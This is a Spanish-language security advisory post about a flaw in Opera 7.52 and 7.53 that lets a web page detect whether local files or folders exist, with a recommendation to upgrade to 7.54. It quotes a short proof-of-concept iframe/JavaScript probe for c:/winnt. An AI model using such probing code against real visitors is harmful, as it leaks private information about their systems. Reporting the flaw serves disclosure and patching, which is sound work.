Revelación de información sensible en Opera 7.52 y 7.53


Se ha descubierto una vulnerabilidad en algunas versiones del popular navegador Opera que podría ser explotada por un usuario remoto para adquirir información sensible de un sistema remoto.





Cuando se asigna a un iframe un archivo o directorio que no existe,
este navegador generará un error. Un usuario remoto puede crear código
HTML que carga un iframe y cambia la URL de dicho recurso a un archivo
o directorio local, y entonces se detecta si hay ese error para
determinar si ese elemento existe.

Se recomienda actualizar a la versión 7.54, disponible en la siguiente dirección:
http://www.opera.com/download/

Como ejemplo el siguiente código extraído de la web de GreyMagic, nos
permite saber si la carpeta "winnt" existe en la máquina de la víctima.

"<iframe src="blank.html"></iframe>
<script type="text/javascript">
onload=function () {
var sLocal="c:/winnt";
frames[0].location.href=sLocal;
setTimeout(
function () {
try {
frames[0].document;
alert(sLocal+" does not exists.");
} catch (oErr) {
alert(sLocal+" exists.");
}
},
250
);
}
</script>"

 

Más Información:

Opera Local File/Directory Detection.
http://www.greymagic.com/security/advisories/gm009-op/

Opera Local File IFRAME Error Response Lets Remote Users Determine if Files or Directories Exist
http://www.securitytracker.com/alerts/2004/Aug/1010966.html

Fuente:
Antonio Román
hispasec.com



Otras noticias de interés:

Firefox y Opera, vulnerables a fuga de información
Opera y Firefox contienen código vulnerable para el manejo de archivos BMP. El problema permite que un atacante genere un archivo en este formato, modificado para obtener datos de la memoria utilizada por estos navegadores. Esta información puede s...
Twilight Hack para la última actualización de Wii
Con su última actualización de Wii Nintendo volvió a tapar el exploit del Zelda que permite ejecutar código sin firmar, pero no lo hizo lo suficientemente bien. En menos de una semana el Team Twiizers ha publicado un nuevo Twilight Hack, específ...
WinFS, crónica de una muerte anunciada
Recientemente conocimos que Microsoft abandonará el proyecto WinFS tal y como fue concebido en un principio. Después de haber generado un gran entusiasmo por parte de los desarrolladores, después de haber captado un gran interés en la comunidad T...
Cross site scripting a través de PHP_SELF en WordPress
Se ha anunciado una vulnerabilidad en WordPress, que puede ser empleada por usuarios maliciosos para construir ataques de cross-site scripting. ...
Que significa la Protección de Datos para las empresas
La Unión Europea quiere endurecer las leyes que regulan la protección de los datos con una nueva normativa comunitaria, que rige cómo las empresas deben manejar la información personal de sus empleados y clientes, y aplica medidas punitivas tan s...
Fundador del movimiento Software Libre visita Venezuela
Richard Stallman, fundador del movimiento de Software Libre y programador del proyecto GNU/Linux, está en Venezuela, en el marco del VI Foro Social-Mundial. Y ha sido invitado a Portuguesa por las autoridades del Iutep....
Los gigantes de Internet acuerdan principios ante la censura
El Wall Street Journal revela que Microsoft, Google y Yahoo! entre otros, han llegado a un acuerdo sobre principios comunes para trabajar en países que restringen la libertad de expresión. Los términos del acuerdo serían anunciados públicamente ...
Google soluciona vulnerabilidades de Chrome 5
El navegador del gigante de Internet se ha vuelto a actualizar en sus distintas versiones para corregir varios problemas de seguridad que podían hacer que un atacante ejecutase código de forma remota....
Lanzan un software gratuito que permite manejar la computadora a partir de movimientos de la cara
Fue desarrollado por la Universidad de Baleares y la empresa TAGRV para que las personas con discapacidades motrices puedan interactuar con cualquier equipo sin usar las manos. Funciona con una cámara web estándar y ya se puede descargar de Interne...
DoS en Windows por imágenes excesivamente grandes
Aunque esta vulnerabilidad parece estar reportada al menos desde agosto de 2004, e incluso hay referencias que se remontan a diciembre de 2003, oficialmente parece existir al menos un documento fechado en mayo de 2005 en donde es presentada detallad...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informacion
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • opera
  • pgp
  • php
  • revelacion
  • sabayon
  • seguridad
  • sensible
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra